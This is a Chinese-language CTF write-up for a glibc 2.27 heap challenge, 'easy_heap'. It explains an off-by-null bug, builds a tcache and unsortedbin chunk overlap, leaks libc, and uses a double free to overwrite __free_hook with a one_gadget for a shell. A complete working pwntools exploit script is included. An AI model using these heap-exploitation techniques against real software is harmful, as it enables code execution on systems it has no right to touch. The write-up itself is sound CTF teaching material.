一道tache的题目,开始学tcache的时候没有调通,今天正好室友也在调这个题目,就又参考CTF-WIKI上的exp调了一下。
题目描述 & 题目漏洞
题目有malloc、free和show三个功能,题目开始calloc了一段内存来存储后续分配的堆块指针和size,题目最多申请10个chunk,idx0~idx9,每次的大小都是固定的0x100,程序接受用户输入的my_read函数有一个off by null的漏洞,但是题目会过滤掉’\x00’的字符,因为题目每次申请的chunk都是固定的0x100,所以在进行常规的chunk overlapping时,不能伪造诸如0x200、0x100的prev_size,利用过程比较巧妙地是利用unsortedbin每次合并或切割chunk时写入prev_size,从而构造unlink的条件。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25unsigned __int64 __fastcall my_read(_BYTE *buf, int size)
{
unsigned int v3; // [rsp+14h] [rbp-Ch]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
v3 = 0;
if ( size )
{
while ( 1 )
{
read(0, &buf[v3], 1uLL);
if ( size - 1 < v3 || !buf[v3] || buf[v3] == 10 ) //过滤'\x00'
break;
++v3;
}
buf[v3] = 0;
buf[size] = 0; //off by null
}
else
{
*buf = 0;
}
return __readfsqword(0x28u) ^ v4;
}
另外libc版本是2.27,有tcache,在利用过程中要注意tcache的填充。
利用过程
利用思路:\
首先申请9个chunk并全部释放,idx6~idx8进入到unsortedbin中,prev_size分别为0x100、0x200、0x300,这里的prev_size说的不太准确,应该是freed chunk与下一个chunk复用的数据域填充的是这个chunk的size。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17for i in range(7):
add(0x10,'aaaa\n') #0 ~ 6
for i in range(3):
add(0x10,'aaaa\n') #7 ~ 9
for i in range(6):
delete(i) #0 ~ 5 free into tcache
delete(9)
##unsortedbin:6+7+8 = 0x300
##6 A:prev_size:0x100 0xa00
##7 B:prev_size:0x200 0xb00
##8 C:prev_size:0x300 0xc00
for i in range(6,9,1):
delete(i) #6~8
1 | gdb-peda$ x /8gx 0x555555757900+0x100 #idx6 A |
再申请7个chunk,清空tcache,然后申请3个chunk,即idx7~idx9,分配idx7时A的prev_size直接分配到idx7中,不会变化,C的orev_size变为0x200,分配idx8时,B的prev_size分配到idx8中,0x200不会改变,C的prev_size变为0x100,最后分配idx9,C的prev_size最终变为0x100。1
2
3
4
5
6for i in range(7):
add(0x10,'aaaa\n') #0 ~ 6
add(0x10,'aaaa\n') #7 A prev_size:0x100
add(0x10,'aaaa\n') #8 B prev_size:0x200
add(0x10,'aaaa\n') #9 C prev_size:0x100
1 | gdb-peda$ x /8gx 0x555555757900+0x100 #idx7 A |
要构造idx8的chunk overlap,需要idx7是freed的状态,利用off by null修改idx9的size由0x101变为0x100,如果释放idx9,触发unlink,通过0x200的prev_size找到idx7,因为idx7是freed状态,可以进行合并,因此0x200+0x100=0x300进入到unsortedbin中,造成了B块的重叠。要注意tcache的填充。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16for i in range(6):
delete(i)
delete(8) #B tcache
delete(7) #A freed unsorted bin prev_size:0x100
##off by null
##0xb00 prev_size:0x100 size:0x100
add(0xf8,'aaaa\n') #0 B malloc from tcache
delete(6) #fill tcache
##trigger unlink
##0x300 put into tcache
##over chunk idx8
delete(9) #C 0x300 put into tcache
这时包含idx0的chunk进入到unsortedbin中,再申请一个0x100的chunk,show(0)就可以泄露libc:1
2
3
4
5
6
7
8
9
10
11
12##leak libc
for i in range(7):
add(0x10,'aaaa\n') #1~7
add(0x10,'aaaa\n') #8
show(0)
leak_addr = u64(p.recvn(6).ljust(8,'\x00'))
libc_base = leak_addr - libc.symbols["__malloc_hook"] - 0x70
print "libc_base:",hex(libc_base)
free_hook = libc_base + libc.symbols["__free_hook"]
#system_addr = libc_base + libc.symbols["system"]
one_gadget = libc_base + 0x4f322
此时申请idx9,它的地址与idx0是相同的,然后分别释放构造double free,exp这里先释放了idx1和idx2是因为题目限制chunk的数目为10,此时只能申请一个idx9了,double free需要再申请3个chunk,因此先释放两个,最后修改free_hook为one_gadget,然后释放一个chunk触发get shell。1
2
3
4
5
6
7
8
9
10
11
12
13
14add(0x10,'aaaa\n') #9 == 0
delete(1)
delete(2)
##double free
delete(0)
delete(9)
add(0x10,p64(free_hook)+'\n') #0
add(0x10,'/bin/sh'+'\n') #1
add(0x10,p64(one_gadget)+'\n') #9
##trigger
delete(1)
完整exp如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109from pwn import *
context.log_level = "debug"
context.terminal = ["tmux","split","-h"]
p = process("./easy_heap")
#p = process(["./easy_heap"],env={"LD_PRELOAD":'./libc64.so'})
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(size,content):
p.recvuntil("> ")
p.sendline('1')
p.recvuntil("> ")
p.sendline(str(size))
p.recvuntil("> ")
p.send(content)
def delete(idx):
p.recvuntil("> ")
p.sendline('2')
p.recvuntil("> ")
p.sendline(str(idx))
def show(idx):
p.recvuntil("> ")
p.sendline('3')
p.recvuntil("> ")
p.sendline(str(idx))
for i in range(7):
add(0x10,'aaaa\n') #0 ~ 6
for i in range(3):
add(0x10,'aaaa\n') #7 ~ 9
for i in range(6):
delete(i) #0 ~ 5 free into tcache
delete(9)
##unsortedbin:6+7+8 = 0x300
##6 A:prev_size:0x100 0xa00
##7 B:prev_size:0x200 0xb00
##8 C:prev_size:0x300 0xc00
for i in range(6,9,1):
delete(i) #6~8
for i in range(7):
add(0x10,'aaaa\n') #0 ~ 6
add(0x10,'aaaa\n') #7 A prev_size:0x100
add(0x10,'aaaa\n') #8 B prev_size:0x200
add(0x10,'aaaa\n') #9 C prev_size:0x100
for i in range(6):
delete(i)
delete(8) #B tcache
delete(7) #A freed unsorted bin prev_size:0x100
##off by null
##0xb00 prev_size:0x100 size:0x100
add(0xf8,'aaaa\n') #0 B malloc from tcache
delete(6) #fill tcache
##trigger unlink
##0x300 put into tcache
##over chunk idx8
delete(9) #C 0x300 put into tcache
##leak libc
for i in range(7):
add(0x10,'aaaa\n') #1~7
add(0x10,'aaaa\n') #8
show(0)
leak_addr = u64(p.recvn(6).ljust(8,'\x00'))
libc_base = leak_addr - libc.symbols["__malloc_hook"] - 0x70
print "libc_base:",hex(libc_base)
free_hook = libc_base + libc.symbols["__free_hook"]
#system_addr = libc_base + libc.symbols["system"]
one_gadget = libc_base + 0x4f322
gdb.attach(p)
add(0x10,'aaaa\n') #9 == 0
delete(1)
delete(2)
##double free
delete(0)
delete(9)
add(0x10,p64(free_hook)+'\n') #0
add(0x10,'/bin/sh'+'\n') #1
add(0x10,p64(one_gadget)+'\n') #9
##trigger
delete(1)
p.interactive()
参考
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack-zh/